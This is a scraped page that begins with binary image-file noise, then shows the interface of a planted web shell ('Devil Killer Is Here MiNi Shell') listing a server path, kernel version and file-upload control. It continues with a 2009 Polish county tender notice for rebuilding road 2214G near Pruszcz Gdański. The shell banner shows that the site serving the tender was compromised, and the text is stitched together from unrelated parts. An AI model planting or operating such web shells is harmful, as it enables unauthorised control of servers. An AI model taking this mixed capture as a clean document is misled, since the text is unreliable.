JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091008/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091008/351600-N-2009.html

<p class="kh_header"><b>Pruszcz Gdański: Przebudowa drogi powiatowej nr 2214G Straszyn-Pruszcz Gdański ul.    Raciborskiego etap I (od km 0+000 do km 2+150) składający się z dwóch następujących podetapów: 1) od km 0+000 do km 0+100 i od km 1+980 do km 2+150 finansowany ze środków własnych Powiatu Gdańskiego - Podetap A.,
2) od km 0+100 do km 1+980  współfinansowany ze środków  Unii Europejskiej w ramach REGIONALNEGO PROGRAMU OPERACYJNEGO DLA WOJEWÓDZTWA POMORSKIEGO NA LATA 2007-2013 ze środków Europejskiego Funduszu Rozwoju Regionalnego, w ramach projektu  nr WND-RPPM.08.01.01.00-032/08. p.n. Przebudowa drogi powiatowej nr 2214G ...</b><br>
<b>Numer ogłoszenia: 351600 - 2009; data zamieszczenia: 08.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Gdański z siedzibą w Pruszczu Gdańskim reprezentowany przez Zarząd Powiatu Gdańskiego , ul. Wojska Polskiego 16, 83-000 Pruszcz Gdański, woj. pomorskie, tel. 058 6834999, faks 058 6834899.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-gdanski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa drogi powiatowej nr 2214G Straszyn-Pruszcz Gdański ul.    Raciborskiego etap I (od km 0+000 do km 2+150) składający się z dwóch następujących podetapów: 1) od km 0+000 do km 0+100 i od km 1+980 do km 2+150 finansowany ze środków własnych Powiatu Gdańskiego - Podetap A.,
2) od km 0+100 do km 1+980  współfinansowany ze środków  Unii Europejskiej w ramach REGIONALNEGO PROGRAMU OPERACYJNEGO DLA WOJEWÓDZTWA POMORSKIEGO NA LATA 2007-2013 ze środków Europejskiego Funduszu Rozwoju Regionalnego, w ramach projektu  nr WND-RPPM.08.01.01.00-032/08. p.n. Przebudowa drogi powiatowej nr 2214G ....</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  Przebudowa drogi powiatowej nr 2214G Straszyn-Pruszcz Gdański ul. Raciborskiego etap I (od km 0+000 do km 2+150) składający się z dwóch następujących podetapów: 
1) od km 0+000 do km 0+100 i od km 1+980 do km 2+150 finansowany ze środków własnych Powiatu Gdańskiego - Podetap A.,
2) od km 0+100 do km 1+980  współfinansowany ze środków  Unii Europejskiej w ramach REGIONALNEGO PROGRAMU OPERACYJNEGO DLA WOJEWÓDZTWA POMORSKIEGO NA LATA 2007-2013 ze środków Europejskiego Funduszu Rozwoju Regionalnego, w ramach projektu  nr WND-RPPM.08.01.01.00-032/08  p.n. Przebudowa drogi powiatowej nr 2214G Straszyn-Pruszcz Gdański ul. Raciborskiego - etap I - Podetap B.
Zakres przedmiotu zamówienia: 
1) roboty przygotowawcze:
- odtworzenie (wyznaczenie) trasy i punktów wysokościowych
- wycinka drzew oraz krzaków
- roboty rozbiórkowe
2) zabezpieczenie, przebudowa i budowa sieci:
- teletechnicznej
- gazowej
- elektroenergetycznej
- oświetlenia ulicznego
- budowa kanalizacji deszczowej 
3) roboty w zakresie konstrukcji nawierzchni jezdni (KR4)
a) wzmocnienie istniejącej jezdni 
b) nowa konstrukcja nawierzchni jezdni
4) roboty w zakresie konstrukcji nawierzchni jezdni (KR2)
- wlot w ul. Objazdową 
- wlot w ul. Turkusową 
-wlot w ul. Leśną 
-wlot w ul. Świerkową 
-wlot w ul. Kościelną 
-wlot w ul. Gerberową 
-wloty na skrzyżowaniu z ul, Piłsudskiego 
-wloty w strefie ronda ul. Jarzębinowa
5) roboty w zakresie konstrukcji nawierzchni 
a) zatok autobusowych szt. 8
b) pierścienia i stożka ronda
c) nowych chodników 
d) drogi rowerowej
- przebudowa istniejącego ciągu pieszo-rowerowego na docinku od km 0+000 
  do km 0+400 i od km 0+550 do km 0+595
- przebudowa istniejącego ciągu pieszo-rowerowego w rejonie skrzyżowania 
  od ul. Leśnej do ul. Kościelnej 
- przebudowa istniejącego ciągu pieszo-rowerowego w rejonie skrzyżowania 
  z ul. Piłsudskiego
- budowa ciągów pieszo-rowerowych w obrębie ronda
e) wysp rozdzielających szt. 16
f) pobocza 
6) roboty w zakresie odwodnienia
- budowa kanalizacji deszczowej 
- wykonanie otwartego rowu odwadniającego umocnionego darnią 
7) sygnalizacja świetlna 
- wykonanie sygnalizacji świetlnej w obrębie skrzyżowania ul. Raciborskiego z ul. Leśną, ul. Świerkową i ul. Kościelną
- wykonanie sygnalizacji świetnej obrębie skrzyżowania ul. Raciborskiego z ul. Piłsudskiego 
8) roboty ziemne drogowe wg bilansu mas ziemnych.
9) oznakowanie pionowe i poziome
- oznakowanie pionowe - znaki odblaskowe o wielkości średnie na słupkach z rur stalowych ocynkowanych.
- oznakowanie poziome - grubowarstwowe malowanie jezdni
10) zieleń 
- nasadzenia zieleni projektowanej
- pielęgnacja zieleni
4.  Podział na podetapy. 
Podział na podetapy rzeczowo-finansowe wynika z planów budżetowych Starostwa Powiatowego oraz zakresu współfinansowania zadania ze środków zewnętrznych. Finansowanie podetapów zadania przewidziano w całości w roku 2010. 
Przedmiotowe zadanie inwestycyjne zostanie zatem wykonane w dwóch podetapach rzeczowo-finansowych:
PODETAP A- od km 0+000 do km 0+100 i od km 1+980 do km 2+150 finansowany ze środków własnych Powiatu Gdańskiego.
PODETAP B- od km 0+100 do km 1+980 współfinansowany ze środków  Unii Europejskiej w ramach REGIONALNEGO PROGRAMU OPERACYJNEGO DLA WOJEWÓDZTWA POMORSKIEGO NA LATA 2007-2013 ze środków Europejskiego Funduszu Rozwoju Regionalnego,
Podetap A - wykonanie przebudowy drogi od km 0+000 do km 0+100 w następującym zakresie:
a)roboty przygotowawcze: 
- wytyczenie trasy projektowanej przebudowy drogi
- wycinka zieleni 
- roboty rozbiórkowe 
b)roboty ziemne: w zakresie wykonywanego poszerzenia nawierzchni 
c)podbudowy i nawierzchnie drogowe  
d)wykonanie chodników i ciągów pieszo-rowerowych 
e)wykonanie oznakowania i urządzeń bezpieczeństwa ruchu drogowego 
f)przebudowa sieci teletechnicznych
g)wybudowanie sieci kanalizacji deszczowej 
oraz wykonanie  przebudowy drogi od km 1+980 do km 2+150 w następującym zakresie: 
a) roboty przygotowawcze: 
- wytyczenie trasy projektowanej przebudowy drogi 
- wycinka zieleni 
- roboty rozbiórkowe 
b) wykonanie zatok autobusowych szt. 2 
c) wykonanie chodników i dróg rowerowych
d) konstrukcja nawierzchni jezdni (KR4)
d) pierścienia ronda z kostki kamiennej 9/11 na podbudowie z kruszywa łamanego stabilizowanego mechanicznie o grubości 20cm
e) stożek ronda do wysokości 1,0m wyłożony brukowcem wapiennym (kolor jasny) f) konstrukcja nawierzchni jezdni (KR2): wloty w strefie ronda   ul. Jarzębinowa
Podetap A wykonać na podstawie przedmiarów robót zgodnie z załącznikiem nr 7 do niniejszego SIWZ przedmiar robót część dodatkowa - na odcinku km 0+000 do km 0+100 oraz przedmiar robót część 2 - na odcinku km 1+980 do km 2+150 i specyfikacji SST.
Podetap B - wykonanie przebudowy drogi od km 0+100 do km 1+980 w zakresie:
a) roboty przygotowawcze: 
- wytyczenie trasy projektowanej przebudowy drogi 
- wycinka zieleni 
- roboty rozbiórkowe
b) roboty ziemne: w zakresie wykonywanej przebudowy nawierzchni 
c) roboty ziemne w zakresie dróg rowerowych i chodników 
d) wykonanie zabezpieczeń i przełożeń istniejących sieci 
f) wybudowanie sieci kanalizacji deszczowej: w zakresie wykonywanej nawierzchni 
g) wzmocnienie istniejącej jezdni 
h) wykonanie konstrukcji nowej nawierzchni jezdni oraz poszerzeń istniejącej nawierzchni 
i) wykonanie konstrukcji zatok autobusowych szt. 6
k) wykonanie nowych chodników 
l) przebudowa drogi rowerowej 
m) wyspy dzielące 
n) pobocza 
o) wykonanie robót w zakresie konstrukcji nawierzchni jezdni (KR2) i wjazdów 
p) sygnalizacji świetlnej 
- wykonanie sygnalizacji świetlnej w obrębie skrzyżowania ul. Raciborskiego  z ul. Leśną, ul. Świerkową i ul. Kościelną
- wykonanie sygnalizacji świetlnej obrębie skrzyżowania ul. Raciborskiego z ul. Piłsudskiego 
r) wykonanie oświetlenia ulicznego 
s) wykonanie oznakowania pionowego i poziomego 
- oznakowanie pionowe - znaki odblaskowe o wielkości średnie na słupkach z rur stalowych ocynkowanych.
- oznakowanie poziome - grubowarstwowe malowanie jezdni
t) wykonanie humusowania 
u) zieleń - wykonanie nasadzenia i pielęgnacja zieleni 
w) wykonanie warstw bitumicznych i warstwy ścieralnej przebudowywanej drogi 
Podetap B wykonać na podstawie przedmiarów robót zgodnie z załącznikiem nr 7 do niniejszego SIWZ  przedmiar robót część 1 od km 0+000 do km  1+ 980 pomniejszona o zakres  przedmiaru robót część dodatkowa - na odcinku km 0+000 do km 0+100 i specyfikacji SST.
5. Szczegółowy opis przedmiotu zamówienia zawarty jest w:
1. planach i rysunkach  - zał. nr 7 do siwz,
Uwaga: W załączonej dokumentacji projektowo- technicznej została ujęta  przebudowa przedmiotowego kabla, ale nie będzie ona realizowana w ramach  niniejszego zamówienia publicznego.
2. przedmiarach robót  - zał. nr 7 do siwz,
3. specyfikacji technicznej wykonania i odbioru robót - zał. nr 7 do siwz.
4.  informacje dodatkowe do przedmiotu zamówienia ( załącznik nr 9 do siwz- zawiera informacje uzupełnione na podstawie pytań zadawanych przez wykonawców w unieważnionym postępowaniu)
6.Zamawiający dopuszcza rozwiązania równoważne opisywanym w specyfikacji technicznej wykonania i odbioru robót - w zakresie wskazanych norm,aprobat, specyfikacji technicznych,systemów odniesienia. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego dostawy, usługi lub roboty budowlane spełnią wymagania określone przez Zamawiającego.
UWAGA:
Zamawiający wymaga aby podczas realizacji przedmiotu zamówienia prace drogowe prowadzone w pasie jezdni były wykonywane z przerwą 
od godz.: 7-8:30 i 15-17:00
7.Zamawiający  dopuszcza zatrudnienie podwykonawcy lub podwykonawców.
8.W przypadku zatrudnienia podwykonawcy lub podwykonawców, w oparciu o art. 36 ust. 4 Ustawy Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, których wykonanie zamierza powierzyć podwykonawcom. Do oferty należy załączyć informację na ten temat (wzór zał. nr 8 do SIWZ). 
9.Umowy pomiędzy Wykonawcą i Podwykonawcami musza być dostarczone do Zamawiającego przed rozpoczęciem przez Podwykonawców robót i zawierać  przedmiot i zakres robót jakie wykona Podwykonawca, ich wartość, termin płatności nie dłuższy niż 21 dni, wskazanie konta bankowego Podwykonawcy, zapis iż Podwykonawca złoży po otrzymaniu wynagrodzenia oświadczenia o otrzymaniu należnego wynagrodzenia od Wykonawcy (Wykonawca dostarczy oświadczenie Zamawiającemu), zapis iż niedochowanie terminu płatności na rzecz Podwykonawcy przez Wykonawcę i brak oświadczenia, o którym mowa powyżej skutkuje automatyczną cesją wynagrodzenia należnego Wykonawcy od Zamawiającego na rzecz Podwykonawcy w wysokości odpowiadającej wynagrodzeniu Podwykonawcy. 
10.Niedochowanie terminu płatności na rzecz Podwykonawcy przez Wykonawcę i brak oświadczenia, o którym mowa w pkt. 9 spowoduje przelanie przez Zamawiającego wynagrodzenia należnego Wykonawcy na rzecz Podwykonawcy, do wysokości wynagrodzenia należnego Podwykonawcy od Wykonawcy. 
11.Kwestie dotyczące podwykonawców określa wzór umowy - zał. nr 5 do SIWZ.
12. Zamawiający dopuszcza rozwiązania równoważne opisywane w specyfikacji technicznej wykonania i odbioru robót - w zakresie wskazanych norm,aprobat,specyfikacji technicznych,systemów odniesienia. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego dostawy, usługi lub roboty budowlane spełnią wymagania określone przez Zamawiającego.
13. W trakcie prowadzenia robót należy przestrzegać przepisów BHP zawartych w Rozporządzeniu Ministra Infrastruktury z dnia 6 lutego 2003 roku (Dz. U. z 2003 roku, Nr 47 poz. 401) w sprawie bezpieczeństwa i higieny pracy podczas wykonywania robót budowlanych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.23.31.20-6, 45.23.31.29-9, 45.23.32.60-9, 45.31.61.10-9, 45.31.62.00-7, 45.10.00.00-8, 45.23.24.51-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest do wniesienia wadium w wysokości 150.000,00 zł (sto pięćdziesiąt tysięcy złotych) najpóźniej w dniu składania ofert do godz. 11.30<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1) Nie podleganie wykluczeniu z postępowania o udzielenie niniejszego zamówienia na podstawie art. 24 ust. 1 i 2 Ustawy.
2) Spełnienie warunków określonych w art. 22 ust. 1 pkt 1-3 Ustawy tj.:
1. posiadają uprawnienia do wykonywania określonej działalności lub czynności,   
jeżeli ustawy nakładają obowiązek posiadania takich uprawnień tj.:
-  prowadzą działalność gospodarczą w zakresie robót budowlanych drogowych.
2.posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem         
technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią   
pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego  i osób zdolnych do wykonywania zamówienia: tj.:
a) wykażą się wykonaniem w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy  -  tym okresie, minimum 2 robót budowlanych odpowiadających swym rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia  (z podaniem ich wartości oraz daty i   miejsca wykonania), o   wartości nie mniejszej niż 5 mln zł każda, oraz załączą dokumenty potwierdzające należyte wykonanie tych robót.
Doświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia:
Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że warunki określony w pkt 2a. spełniają łącznie.
Określenie roboty budowlane tożsame z przedmiotem niniejszego postępowania oznacza: wykonanie robót na drogach publicznych - budowa, przebudowa lub remont drogi publicznej minimum o klasie drogi zbiorczej.
b)oddelegują do wykonania przedmiotu zamówienia kierownika budowy posiadającego uprawnienia do kierowania robotami drogowymi.
c)oddelegują do wykonania przedmiotu zamówienia kierownika robót posiadającego uprawnienia do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,
d)oddelegują do wykonania przedmiotu zamówienia kierownika robót posiadającego uprawnienia do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,
e) oddelegują do wykonania przedmiotu zamówienia kierownika robót posiadającego uprawnienia do kierowania robotami w specjalności telekomunikacyjnej i teletechnicznej.
Potencjał kadrowy Wykonawców wspólnie ubiegających się o udzielenie niniejszego Zamówienia:
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że warunki określony w pkt 2 b- e spełniają łącznie.
3. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tj.:
a) posiadają ubezpieczenie  od odpowiedzialności cywilnej (lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności  cywilnej) w zakresie prowadzonej działalności gospodarczej, w tym zgodnej z przedmiotem niniejszego zamówienia, na wartość co najmniej 3 mln zł. Ubezpieczenie winno obejmować zarówno Odpowiedzialność Cywilną deliktową jak i kontraktową . Ubezpieczenie powinno pokrywać szkody osobowe i rzeczowe wraz z ich następstwami. Jeżeli wystawione są dwie oddzielne polisy, jedna obejmująca OC deliktową a druga - kontraktową, to w każdej z tych polis suma gwarancyjna powinna wynosić min 3 mln zł.
b)dysponują własnymi środkami finansowymi (dopuszczalne jest tu wykazanie środków z kredytu) i/lub zdolnością kredytową w wysokości nie mniejszej niż 3 mln PLN. 
Potencjał ekonomiczno-finansowy Wykonawców wspólnie ubiegających się o udzielenie zamówienia: 
Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że warunki określony w pkt 3 a -b spełniają łącznie. 
Spełnianie warunków udziału w postępowaniu oceniane będzie na podstawie załączonych do oferty oświadczenia i dokumentu, o których mowa w pkt VIII.1 i w pkt VIII.7 siwz oraz oryginałów lub kopii poświadczonych za zgodność z oryginałem przez Wykonawcę dokumentów określonych w pkt VIII.2-6 i w pkt VIII.8-11  siwz.  
Spełnienie warunków przez podmioty występujące wspólnie (np. tzw. konsorcja):
W celu potwierdzenia spełnienia warunków udziału w postępowaniu każdy z podmiotów występujących wspólnie winien załączyć do oferty oświadczenie, o którym mowa w pkt VIII.1 siwz oraz dokumenty, o których mowa w pkt VIII.2- 5 siwz. W zakresie pozostałych dokumentów Wykonawcy występujący wspólnie winni wykazać się, iż łącznie spełniają te warunki poprzez złożenie dokumentów określonych w pkt VIII.6-12 siwz oraz złożyć łącznie wypełnione dokumenty określone w pkt IX 1-6 siwz.
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. VIII 2 -3 i 5  składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości, 
b) nie orzeczono wobec niego zakazu ubiegania się o zamówienie. 
Dokumenty, wymienione w pkt VIII 2 i 4-5, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  Dokumenty, o których mowa w pkt VIII 3 i 10 powinny być wystawione nie wcześniej niż 3 miesiące przed upływem terminu do składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Terminy dla tego oświadczenia są takie same, jak dla składanych dokumentów. 
Dokumenty wymienione w pkt VIII 2-5 i 7-11 sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę. 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia: 
oświadczenia i dokumenty wymienione w pkt. VIII 1-5 i 11 winny być przedłożone przez każdego Wykonawcę; dokumenty wymienione w pkt 6-10 winny być przedłożone w imieniu wszystkich Wykonawców..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Oświadczenie Wykonawcy o nie podleganiu wykluczeniu z postępowania w oparciu o art.  24 ust. 1 i 2 Ustawy (wzór zał. nr 2 do siwz).
2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3. Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu do składania ofert.
4. Aktualna informacja z Krajowego Rejestru Karnego wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert - w zakresie określonym w art. 24 ust. 1 pkt 4-8 Ustawy.
5. Aktualna informacja z Krajowego Rejestru Karnego wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert - w zakresie określonym w art. 24 ust. 1 pkt 9 Ustawy.
6.  Dowód wniesienia wadium.
7.  Wykaz wykonanych minimum 2 robót budowlanych o wartości nie mniejszej niż 5 mln zł 	każda, wykonanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania,a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie 
(wzór zał. nr 3 do siwz), z podaniem ich wartości oraz daty i miejsca wykonania wraz z dokumentami potwierdzającymi, że roboty te zostały wykonane należycie.
8. Uprawnienia wraz z aktualnym zaświadczeniem o przynależności do właściwej Izby Inżynierów osób, które będą pełnić obowiązki:
a)kierownika budowy, posiadającego uprawnienia do kierowania robotami drogowymi.
b)kierownika robót, posiadającego uprawnienia do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,
c)kierownika robót, posiadającego uprawnienia do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,
d) kierownika robót, posiadającego uprawnienia do kierowania robotami w specjalności telekomunikacyjnej i teletechnicznej.
9. Informacja z banku lub spółdzielczej kasy  oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy  w wysokości nie mniejszej niż 3 mln PLN wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania  ofert. tzw. opinia bankowa
10. Polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, w tym zgodnej z przedmiotem niniejszego zamówienia, na wartość co najmniej 3 mln zł .
Ubezpieczenie winno obejmować zarówno Odpowiedzialność Cywilną deliktową jak 
i kontraktową . Ubezpieczenie powinno pokrywać szkody osobowe i rzeczowe wraz z ich następstwami. Jeżeli wystawione są dwie oddzielne polisy, jedna obejmująca OC deliktową a druga - kontraktową, to w każdej z tych polis suma gwarancyjna powinna wynosić min 3 mln zł.
11.Umowa konsorcjum (o ile dotyczy).</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
